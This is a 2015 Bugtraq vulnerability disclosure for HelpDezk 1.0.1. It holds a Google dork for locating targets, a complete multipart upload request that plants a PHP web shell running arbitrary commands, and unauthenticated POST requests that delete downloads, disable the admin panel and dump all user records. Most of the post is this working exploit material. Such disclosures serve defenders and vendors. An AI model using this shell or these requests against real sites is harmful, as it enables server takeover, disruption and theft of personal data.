[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201502262059.t1QKxEcH010075@sf01web1.securityfocus.com>
Date: Thu, 26 Feb 2015 20:59:14 GMT
From: dennis.veninga@...il.com
To: bugtraq@...urityfocus.com
Subject: HelpDezk 1.0.1 Multiple Vulnerabilities
# Exploit Title: HelpDezk 1.0.1 Multiple Vulnerabilities
# Google Dork: "intext: helpdezk-community-1.0.1"
# Date: 26-2-2015
# Exploit Author: Dennis Veninga
# Vendor Homepage: http://www.helpdezk.org/
# Vendor contacted: 26-2-2015
# Version: 1.0.1
# Tested on: Firefox 36 & Chrome 38 / W8.1-x64
HelpDezk ->
Version: 1.0.1
Type: Multiple Critical Vulnerabilities
Severity: Critical
Info Exploit: Different exploits making it possible to take over the website/server
- Arbitrary File Upload
- Remote Command Execution
- User Information Disclosure
###############################################
Arbitrary File Upload, 2 ways ->
1. Direct Access:
http://{target}/helpdezk/admin/logos/upload
#########
2. POST: http://localhost/helpdezk/admin/logos/upload
After posting this, visit http://{target}/helpdezk/app/uploads/logos/shell.php?cmd=whoami
CONTENT:
-----------------------------14463264629720\r\n
Content-Disposition: form-data; name="file"; filename="shell.php"\r\n
Content-Type: application/octet-stream\r\n
\r\n
<?php\r\n
if(isset($_REQUEST['cmd'])){\r\n
$cmd = ($_REQUEST["cmd"]);\r\n
system($cmd);\r\n
echo "</pre>$cmd<pre>";\r\n
die;\r\n
}\r\n
?>\r\n
-----------------------------14463264629720--\r\n
###############################################
Remote Command Execution, you see an white page with 'ok' when SUCCESS!
Delete a download
POST: http://localhost/helpdezk/admin/downloads/delete
CONTENT: id={IDNUMBER}
Deactivate admin panel: *use /activate and id={IDNUMBER} to activate again*
POST: http://{localhost}/helpdezk/admin/modules/deactivate
CONTENT: id=1
id=1 = Admin
id=2 = Dashboard
id=3 = HelpDezk
###############################################
User Information Disclosure
NOTE: Stop javascript, else it will quickly show all info and returns you to the login page.
POST: http://{target}/helpdezk/admin/relPessoa/table_json/
CONTENT: typeperson=ALL
###############################################
I'm sure I didn't find everything, but maybe time to fix those huge issues first!
Powered by blists - more mailing lists